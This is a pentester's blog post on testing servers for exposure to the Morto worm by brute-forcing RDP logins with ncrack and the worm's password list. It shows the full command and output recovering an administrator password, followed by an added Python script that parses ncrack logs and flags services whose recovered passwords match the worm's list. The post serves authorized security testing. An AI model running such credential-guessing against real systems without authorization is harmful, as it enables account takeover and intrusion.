carnal0wnage

Monday, August 29, 2011

Using ncrack to test for servers vuln to Morto worm

Looks like the Morto worm is floating around. On pentests I frequently run into hosts where the only thing exposed is 3389 (RDP), and if the local admin account is still named "administrator" you can beat up on it pretty good with ncrack.

hdm did a post on why/how you can find those pesky local admin accounts with weak passwords by using the Metasploit smb_login module. Post is here.

If you're somewhere that SMB isn't allowed out and someone is gonna give you a hassle about testing it, you can always use ncrack against RDP to prove your point. I did a short post on it a while back.

Anyway, grab it from the nmap svn and compile it; I don't think the RDP plugin was enabled in the downloadable binaries (I didn't check... I use the svn).

The F-Secure blog has the list of passwords it's using here.

Looks like this:

$ ncrack -vv -d7 --user administrator -P /home/user/morto.txt 192.168.26.137:3389,CL=2

rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'
rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94
rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'
rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2
...
Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'
rdp://192.168.26.137:3389 last: 0.02 current 0.01 parallelism 2
rdp://192.168.26.137:3389 Increasing connection limit to: 2
rdp://192.168.26.137:3389 (EID 30) Attempts: total 30 completed 30 supported 1 --- rate 1.62
rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'
rdp://192.168.26.137:3389 finished.
rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81
nsock_loop returned 3

Discovered credentials for rdp on 192.168.26.137 3389/tcp:
192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'

Ncrack done: 1 service scanned in 18.00 seconds.
Probes sent: 31 timed-out: 0 prematurely-closed: 0

Ncrack finished.
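When you run this across more than one host, reading the raw ncrack log gets old fast, and what the client actually wants is a short list of which RDP services gave up an account to one of the worm's passwords. The following parser is an added example, not part of the original post or of ncrack itself: it reads the per-service lines in the format shown above (the "Login failed", "Discovered credentials on", "Attempts: total" and "finished." lines), builds a summary per service, and flags any service whose recovered password is on a small constructed stand-in for the F-Secure list (just the four passwords the run above tried; the real list is not shipped here). The sample output is constructed to match the post's output and is not a live capture.

```python
import re

# Constructed sample in the format of the ncrack output quoted in the post
# (same host, port and result as the post); not a live capture.
SAMPLE_OUTPUT = """\
rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'
rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94
rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'
rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2
Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'
rdp://192.168.26.137:3389 Increasing connection limit to: 2
rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'
rdp://192.168.26.137:3389 finished.
rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81
nsock_loop returned 3

Discovered credentials for rdp on 192.168.26.137 3389/tcp:
192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'

Ncrack done: 1 service scanned in 18.00 seconds.
"""

# The passwords the post's run tried: a constructed stand-in for the
# F-Secure Morto list, which this script does not ship.
MORTO_SAMPLE_LIST = {"admin", "password", "admin123", "1234567890"}

# Building blocks for the per-service line formats ncrack prints.
SERVICE = r"(?P<svc>[a-z]+://\S+)"
CRED = r"'(?P<user>[^']*)' '(?P<pw>[^']*)'"
FAILED_RE = re.compile(rf"^{SERVICE} \(EID \d+\) Login failed: {CRED}$")
FOUND_RE = re.compile(rf"^Discovered credentials on {SERVICE} {CRED}$")
ATTEMPTS_RE = re.compile(
    rf"^{SERVICE} \(EID \d+\) Attempts: total (?P<total>\d+) completed (?P<done>\d+)")
FINISHED_RE = re.compile(rf"^{SERVICE} finished\.$")


def _entry(results, svc):
    """Get or create the per-service record."""
    return results.setdefault(
        svc, {"failed": [], "found": [], "attempts": 0, "finished": False})


def parse_ncrack_output(text):
    """Return {service_url: record} built from ncrack's per-service lines.
    Lines it does not recognise (rate, parallelism, nsock debug, the
    end-of-run summary) are ignored rather than guessed at."""
    results = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = FAILED_RE.match(line)
        if m:
            _entry(results, m["svc"])["failed"].append((m["user"], m["pw"]))
            continue
        m = FOUND_RE.match(line)
        if m:
            _entry(results, m["svc"])["found"].append((m["user"], m["pw"]))
            continue
        m = ATTEMPTS_RE.match(line)
        if m:
            e = _entry(results, m["svc"])
            e["attempts"] = max(e["attempts"], int(m["total"]))
            continue
        m = FINISHED_RE.match(line)
        if m:
            _entry(results, m["svc"])["finished"] = True
    return results


def morto_exposed(results, wordlist=MORTO_SAMPLE_LIST):
    """Services where a recovered password is on the worm's list: these are
    the hosts that need the password changed (and RDP taken off the edge)
    first."""
    return sorted(svc for svc, e in results.items()
                  if any(pw in wordlist for _, pw in e["found"]))


def summarize(results):
    """One line per service plus any recovered credentials, for the report."""
    lines = []
    for svc, e in sorted(results.items()):
        status = "finished" if e["finished"] else "incomplete"
        lines.append(f"{svc}: {e['attempts']} attempts, {len(e['failed'])} failed, "
                     f"{len(e['found'])} found ({status})")
        for user, pw in e["found"]:
            lines.append(f"  {user} / {pw}")
    return "\n".join(lines)


if __name__ == "__main__":
    res = parse_ncrack_output(SAMPLE_OUTPUT)
    print(summarize(res))
    print("Morto-exposed:", morto_exposed(res))
```

Feed it a real run with `python3 parse_ncrack.py < ncrack.log` after swapping `SAMPLE_OUTPUT` for `sys.stdin.read()`; a service marked "incomplete" means ncrack never printed its "finished." line (timeout, or the run was interrupted), so a clean result there proves nothing.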